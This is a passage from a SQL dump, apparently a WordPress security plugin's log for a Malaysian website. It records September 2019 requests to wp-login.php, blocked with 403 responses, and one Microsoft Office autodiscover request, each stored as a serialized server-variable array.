02:01:41',30808152,32620296,'https://bintara.com.my/?page_id=18',1,0,'119.235.48.205'),(26847,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:66:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:67:\"/wp-login.php?redirect_to=https://bintara.com.my/wp-admin/&reauth=1\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:6:\"H2PUSH\";s:2:\"on\";s:7:\"H2_PUSH\";s:2:\"on\";s:9:\"H2_PUSHED\";s:0:\"\";s:12:\"H2_PUSHED_ON\";s:0:\"\";s:12:\"H2_STREAM_ID\";s:1:\"5\";s:13:\"H2_STREAM_TAG\";s:5:\"330-5\";s:5:\"HTTP2\";s:2:\"on\";s:5:\"HTTPS\";s:2:\"on\";s:11:\"HTTP_ACCEPT\";s:118:\"text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3\";s:20:\"HTTP_ACCEPT_ENCODING\";s:17:\"gzip, deflate, br\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"en-US,en;q=0.9\";s:11:\"HTTP_COOKIE\";s:42:\"icwp-wpsf=6154a8f6f75db9018d0a71b28cd6a258\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:19:\"HTTP_SEC_FETCH_MODE\";s:8:\"navigate\";s:19:\"HTTP_SEC_FETCH_SITE\";s:4:\"none\";s:19:\"HTTP_SEC_FETCH_USER\";s:2:\"?1\";s:30:\"HTTP_UPGRADE_INSECURE_REQUESTS\";s:1:\"1\";s:15:\"HTTP_USER_AGENT\";s:115:\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/76.0.3809.132 Safari/537.36\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_H2PUSH\";s:2:\"on\";s:16:\"REDIRECT_H2_PUSH\";s:2:\"on\";s:18:\"REDIRECT_H2_PUSHED\";s:0:\"\";s:21:\"REDIRECT_H2_PUSHED_ON\";s:0:\"\";s:21:\"REDIRECT_H2_STREAM_ID\";s:1:\"5\";s:22:\"REDIRECT_H2_STREAM_TAG\";s:5:\"330-5\";s:14:\"REDIRECT_HTTP2\";s:2:\"on\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:32:\"REDIRECT_REDIRECT_REQUEST_METHOD\";s:3:\"GET\";s:28:\"REDIRECT_REDIRECT_SCRIPT_URI\";s:35:\"https://bintara.com.my/wp-login.php\";s:28:\"REDIRECT_REDIRECT_SCRIPT_URL\";s:13:\"/wp-login.php\";s:24:\"REDIRECT_REDIRECT_STATUS\";s:3:\"403\";s:27:\"REDIRECT_REDIRECT_UNIQUE_ID\";s:27:\"XYgk1hvUhDgROhmDVGmUTQAAAAU\";s:19:\"REDIRECT_SCRIPT_URI\";s:35:\"https://bintara.com.my/wp-login.php\";s:19:\"REDIRECT_SCRIPT_URL\";s:13:\"/wp-login.php\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"403\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XYgk1hvUhDgROhmDVGmUTQAAAAU\";s:12:\"REDIRECT_URL\";s:10:\"/403.shtml\";s:11:\"REMOTE_ADDR\";s:14:\"175.139.174.69\";s:11:\"REMOTE_PORT\";s:5:\"50093\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:35:\"https://bintara.com.my/wp-login.php\";s:10:\"SCRIPT_URL\";s:13:\"/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/2.0\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYgk1hvUhDgROhmDVGmUTQAAAAU\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1569203415.0419\";s:12:\"REQUEST_TIME\";s:10:\"1569203415\";}}','notice','2019-09-23 01:50:16','2019-09-23 01:50:15',30771800,32578648,'https://bintara.com.my/wp-login.php?redirect_to=https://bintara.com.my/wp-admin/&reauth=1',1,0,'175.139.174.69'),(26846,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:64:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:67:\"/wp-login.php?redirect_to=https://bintara.com.my/wp-admin/&reauth=1\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:6:\"H2PUSH\";s:2:\"on\";s:7:\"H2_PUSH\";s:2:\"on\";s:9:\"H2_PUSHED\";s:0:\"\";s:12:\"H2_PUSHED_ON\";s:0:\"\";s:12:\"H2_STREAM_ID\";s:1:\"3\";s:13:\"H2_STREAM_TAG\";s:4:\"22-3\";s:5:\"HTTP2\";s:2:\"on\";s:5:\"HTTPS\";s:2:\"on\";s:11:\"HTTP_ACCEPT\";s:118:\"text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3\";s:20:\"HTTP_ACCEPT_ENCODING\";s:17:\"gzip, deflate, br\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"en-US,en;q=0.9\";s:11:\"HTTP_COOKIE\";s:42:\"icwp-wpsf=6154a8f6f75db9018d0a71b28cd6a258\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:19:\"HTTP_SEC_FETCH_SITE\";s:4:\"none\";s:30:\"HTTP_UPGRADE_INSECURE_REQUESTS\";s:1:\"1\";s:15:\"HTTP_USER_AGENT\";s:115:\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/76.0.3809.132 Safari/537.36\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_H2PUSH\";s:2:\"on\";s:16:\"REDIRECT_H2_PUSH\";s:2:\"on\";s:18:\"REDIRECT_H2_PUSHED\";s:0:\"\";s:21:\"REDIRECT_H2_PUSHED_ON\";s:0:\"\";s:21:\"REDIRECT_H2_STREAM_ID\";s:1:\"3\";s:22:\"REDIRECT_H2_STREAM_TAG\";s:4:\"22-3\";s:14:\"REDIRECT_HTTP2\";s:2:\"on\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:32:\"REDIRECT_REDIRECT_REQUEST_METHOD\";s:3:\"GET\";s:28:\"REDIRECT_REDIRECT_SCRIPT_URI\";s:35:\"https://bintara.com.my/wp-login.php\";s:28:\"REDIRECT_REDIRECT_SCRIPT_URL\";s:13:\"/wp-login.php\";s:24:\"REDIRECT_REDIRECT_STATUS\";s:3:\"403\";s:27:\"REDIRECT_REDIRECT_UNIQUE_ID\";s:27:\"XYgkdNgT8SLwZ2vcJZwSDAAAAAM\";s:19:\"REDIRECT_SCRIPT_URI\";s:35:\"https://bintara.com.my/wp-login.php\";s:19:\"REDIRECT_SCRIPT_URL\";s:13:\"/wp-login.php\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"403\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XYgkdNgT8SLwZ2vcJZwSDAAAAAM\";s:12:\"REDIRECT_URL\";s:10:\"/403.shtml\";s:11:\"REMOTE_ADDR\";s:14:\"175.139.174.69\";s:11:\"REMOTE_PORT\";s:5:\"50052\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:35:\"https://bintara.com.my/wp-login.php\";s:10:\"SCRIPT_URL\";s:13:\"/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/2.0\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYgkdNgT8SLwZ2vcJZwSDAAAAAM\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1569203316.6505\";s:12:\"REQUEST_TIME\";s:10:\"1569203316\";}}','notice','2019-09-23 01:48:38','2019-09-23 01:48:37',30766592,32572872,'https://bintara.com.my/wp-login.php?redirect_to=https://bintara.com.my/wp-admin/&reauth=1',1,0,'175.139.174.69'),(26845,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:49:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:30:\"/AutoDiscover/autodiscover.xml\";s:14:\"CONTENT_LENGTH\";s:3:\"315\";s:12:\"CONTENT_TYPE\";s:23:\"text/xml; charset=utf-8\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:72:\"Microsoft Office/16.0 (Windows NT 10.0; Microsoft Excel 16.0.11929; Pro)\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:25:\"HTTP_X_OFFICE_APPLICATION\";s:1:\"1\";s:27:\"HTTP_X_OFFICE_AUDIENCEGROUP\";s:8:\"Insiders\";s:27:\"HTTP_X_OFFICE_MAJOR_VERSION\";s:2:\"16\";s:22:\"HTTP_X_OFFICE_PLATFORM\";s:5:\"Win32\";s:23:\"HTTP_X_OFFICE_SESSIONID\";s:36:\"D5497532-30F4-4795-A3D8-D1A120BC8621\";s:21:\"HTTP_X_OFFICE_VERSION\";s:10:\"16.0.11929\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:19:\"REDIRECT_SCRIPT_URI\";s:52:\"https://bintara.com.my/AutoDiscover/autodiscover.xml\";s:19:\"REDIRECT_SCRIPT_URL\";s:30:\"/AutoDiscover/autodiscover.xml\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XYgkVtgT8SLwZ2vcJZwR-QAAAA4\";s:12:\"REDIRECT_URL\";s:30:\"/AutoDiscover/autodiscover.xml\";s:11:\"REMOTE_ADDR\";s:14:\"175.139.174.69\";s:11:\"REMOTE_PORT\";s:5:\"50449\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:52:\"https://bintara.com.my/AutoDiscover/autodiscover.xml\";s:10:\"SCRIPT_URL\";s:30:\"/AutoDiscover/autodiscover.xml\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYgkVtgT8SLwZ2vcJZwR-QAAAA4\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1569203286.5442\";s:12:\"REQUEST_TIME\";s:10:\"1569203286\";}}','notice','2019-09-23 01:48:08','2019-09-23 01:48:06',31084928,32892200,'https://bintara.com.my/AutoDiscover/autodiscover.xml',1,0,'175.139.174.69'),(26844,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:64:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:67:\"/wp-login.php?redirect_to=https://bintara.com.my/wp-admin/&reauth=1\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:6:\"H2PUSH\";s:2:\"on\";s:7:\"H2_PUSH\";s:2:\"on\";s:9:\"H2_PUSHED\";s:0:\"\";s:12:\"H2_PUSHED_ON\";s:0:\"\";s:12:\"H2_STREAM_ID\";s:1:\"3\";s:13:\"H2_STREAM_TAG\";s:4:\"11-3\";s:5:\"HTTP2\";s:2:\"on\";s:5:\"HTTPS\";s:2:\"on\";s:11:\"HTTP_ACCEPT\";s:118:\"text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3\";s:20:\"HTTP_ACCEPT_ENCODING\";s:17:\"gzip, deflate, br\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"en-US,en;q=0.9\";s:11:\"HTTP_COOKIE\";s:42:\"icwp-wpsf=add3fe6942f933b903d72105ced5cb8e\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:19:\"HTTP_SEC_FETCH_SITE\";s:4:\"none\";s:30:\"HTTP_UPGRADE_INSECURE_REQUESTS\";s:1:\"1\";s:15:\"HTTP_USER_AGENT\";s:115:\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/76.0.3809.132 Safari/537.36\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_H2PUSH\";s:2:\"on\";s:16:\"REDIRECT_H2_PUSH\";s:2:\"on\";s:18:\"REDIRECT_H2_PUSHED\";s:0:\"\";s:21:\"REDIRECT_H2_PUSHED_ON\";s:0:\"\";s:21:\"REDIRECT_H2_STREAM_ID\";s:1:\"3\";s:22:\"REDIRECT_H2_STREAM_TAG\";s:4:\"11-3\";s:14:\"REDIRECT_HTTP2\";s:2:\"on\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:32:\"REDIRECT_REDIRECT_REQUEST_METHOD\";s:3:\"GET\";s:28:\"REDIRECT_REDIRECT_SCRIPT_URI\";s:35:\"https://bintara.com.my/wp-login.php\";s:28:\"REDIRECT_REDIRECT_SCRIPT_URL\";s:13:\"/wp-login.php\";s:24:\"REDIRECT_REDIRECT_STATUS\";s:3:\"403\";s:27:\"REDIRECT_REDIRECT_UNIQUE_ID\";s:27:\"XYgkAdgT8SLwZ2vcJZwR1wAAAAM\";s:19:\"REDIRECT_SCRIPT_URI\";s:35:\"https://bintara.com.my/wp-login.php\";s:19:\"REDIRECT_SCRIPT_URL\";s:13:\"/wp-login.php\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"403\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XYgkAdgT8SLwZ2vcJZwR1wAAAAM\";s:12:\"REDIRECT_URL\";s:10:\"/403.shtml\";s:11:\"REMOTE_ADDR\";s:14:\"175.139.174.69\";s:11:\"REMOTE_PORT\";s:5:\"50144\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:35:\"https://bintara.com.my/wp-login.php\";s:10:\"SCRIPT_URL\";s:13:\"/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/2.0\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYgkAdgT8SLwZ2vcJZwR1wAAAAM\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1569203201.5979\";s:12:\"REQUEST_TIME\";s:10:\"1569203201\";}}','notice','2019-09-23 01:46:43','2019-09-23 01:46:42',30766592,32572872,'https://bintara.com.my/wp-login.php?redirect_to=https://bintara.com.my/wp-admin/&reauth=1',1,0,'175.139.174.69'),(26843,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:64:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:67:\"/wp-login.php?redirect_to=https://bintara.com.my/wp-admin/&reauth=1\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:6:\"H2PUSH\";s:2:\"on\";s:7:\"H2_PUSH\";s:2:\"on\";s:9:\"H2_PUSHED\";s:0:\"\";s:12:\"H2_PUSHED_ON\";s:0:\"\";s:12:\"H2_STREAM_ID\";s:1:\"3\";s:13:\"H2_STREAM_TAG\";s:5:\"455-3\";s:5:\"HTTP2\";s:2:\"on\";s:5:\"HTTPS\";s:2:\"on\";s:11:\"HTTP_ACCEPT\";s:118:\"text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3\";s:20:\"HTTP_ACCEPT_ENCODING\";s:17:\"gzip, deflate, br\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"en-US,en;q=0.9\";s:11:\"HTTP_COOKIE\";s:42:\"icwp-wpsf=0a5550899eeb5b7b9adc51456e7be0b3\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:19:\"HTTP_SEC_FETCH_SITE\";s:4:\"none\";s:30:\"HTTP_UPGRADE_INSECURE_REQUESTS\";s:1:\"1\";s:15:\"HTTP_USER_AGENT\";s:115:\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/76.0.3809.132 Safari/537.36\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_H2PUSH\";s:2:\"on\";s:16:\"REDIRECT_H2_PUSH\";s:2:\"on\";s:18:\"REDIRECT_H2_PUSHED\";s:0:\"\";s:21:\"REDIRECT_H2_PUSHED_ON\";s:0:\"\";s:21:\"REDIRECT_H2_STREAM_ID\";s:1:\"3\";s:22:\"REDIRECT_H2_STREAM_TAG\";s:5:\"455-3\";s:14:\"REDIRECT_HTTP2\";s:2:\"on\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:32:\"REDIRECT_REDIRECT_REQUEST_METHOD\";s:3:\"GET\";s:28:\"REDIRECT_REDIRECT_SCRIPT_URI\";s:35:\"https://bintara.com.my/wp-login.php\";s:28:\"REDIRECT_REDIRECT_SCRIPT_URL\";s:13:\"/wp-login.php\";s:24:\"REDIRECT_REDIRECT_STATUS\";s:3:\"403\";s:27:\"REDIRECT_REDIRECT_UNIQUE_ID\";s:27:\"XYgjyLp66oO1SlzUVT6NKAAAAAM\";s:19:\"REDIRECT_SCRIPT_URI\";s:35:\"https://bintara.com.my/wp-login.php\";s:19:\"REDIRECT_SCRIPT_URL\";s:13:\"/wp-login.php\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"403\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XYgjyLp66oO1SlzUVT6NKAAAAAM\";s:12:\"REDIRECT_URL\";s:10:\"/403.shtml\";s:11:\"REMOTE_ADDR\";s:14:\"175.139.174.69\";s:11:\"REMOTE_PORT\";s:5:\"50131\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:35:\"https://bintara.com.my/wp-login.php\";s:10:\"SCRIPT_URL\";s:13:\"/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/2.0\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYgjyLp66oO1SlzUVT6NKAAAAAM\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:14:\"1569203144.129\";s:12:\"REQUEST_TIME\";s:10:\"1569203144\";}}','notice','2019-09-23 01:45:46','2019-09-23 01:45:44',30767600,32583800,'https://bintara.com.my/wp-login.php?redirect_to=https://bintara.com.my/wp-admin/&reauth=1',1,0,'175.139.174.69'),(26842,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:64:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:67:\"/wp-login.php?redirect_to=https://bintara.com.my/wp-admin/&reauth=1\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:6:\"H2PUSH\";s:2:\"on\";s:7:\"H2_PUSH\";s:2:\"on\";s:9:\"H2_PUSHED\";s:0:\"\";s:12:\"H2_PUSHED_ON\";s:0:\"\";s:12:\"H2_STREAM_ID\";s:1:\"3\";s:13:\"H2_STREAM_TAG\";s:4:\"17-3\";s:5:\"HTTP2\";s:2:\"on\";s:5:\"HTTPS\";s:2:\"on\";s:11:\"HTTP_ACCEPT\";s:118:\"text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3\";s:20:\"HTTP_ACCEPT_ENCODING\";s:17:\"gzip, deflate, br\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"en-US,en;q=0.9\";s:11:\"HTTP_COOKIE\";s:42:\"icwp-wpsf=add3fe6942f933b903d72105ced5cb8e\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:19:\"HTTP_SEC_FETCH_SITE\";s:4:\"none\";s:30:\"HTTP_UPGRADE_INSECURE_REQUESTS\";s:1:\"1\";s:15:\"HTTP_USER_AGENT\";s:115:\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/76.0.3809.132 Safari/537.36\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_H2PUSH\";s:2:\"on\";s:16:\"REDIRECT_H2_PUSH\";s:2:\"on\";s:18:\"REDIRECT_H2_PUSHED\";s:0:\"\";s:21:\"REDIRECT_H2_PUSHED_ON\";s:0:\"\";s:21:\"REDIRECT_H2_STREAM_ID\";s:1:\"3\";s:22:\"REDIRECT_H2_STREAM_TAG\";s:4:\"17-3\";s:14:\"REDIRECT_HTTP2\";s:2:\"on\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:32:\"REDIRECT_REDIRECT_REQUEST_METHOD\";s:3:\"GET\";s:28:\"REDIRECT_REDIRECT_SCRIPT_URI\";s:35:\"https://bintara.com.my/wp-login.php\";s:28:\"REDIRECT_REDIRECT_SCRIPT_URL\";s:13:\"/wp-login.php\";s:24:\"REDIRECT_REDIRECT_STATUS\";s:3:\"403\";s:27:\"REDIRECT_REDIRECT_UNIQUE_ID\";s:27:\"XYgjoNgT8SLwZ2vcJZwRqgAAAAM\";s:19:\"REDIRECT_SCRIPT_URI\";s:35:\"https://bintara.com.my/wp-login.php\";s:19:\"REDIRECT_SCRIPT_URL\";s:13:\"/wp-login.php\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"403\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XYgjoNgT8SLwZ2vcJZwRqgAAAAM\";s:12:\"REDIRECT_URL\";s:10:\"/403.shtml\";s:11:\"REMOTE_ADDR\";s:14:\"175.139.174.69\";s:11:\"REMOTE_PORT\";s:5:\"50116\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:35:\"https://bintara.com.my/wp-login.php\";s:10:\"SCRIPT_URL\";s:13:\"/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/2.0\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYgjoNgT8SLwZ2vcJZwRqgAAAAM\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1569203104.1213\";s:12:\"REQUEST_TIME\";s:10:\"1569203104\";}}','notice','2019-09-23 01:45:05','2019-09-23 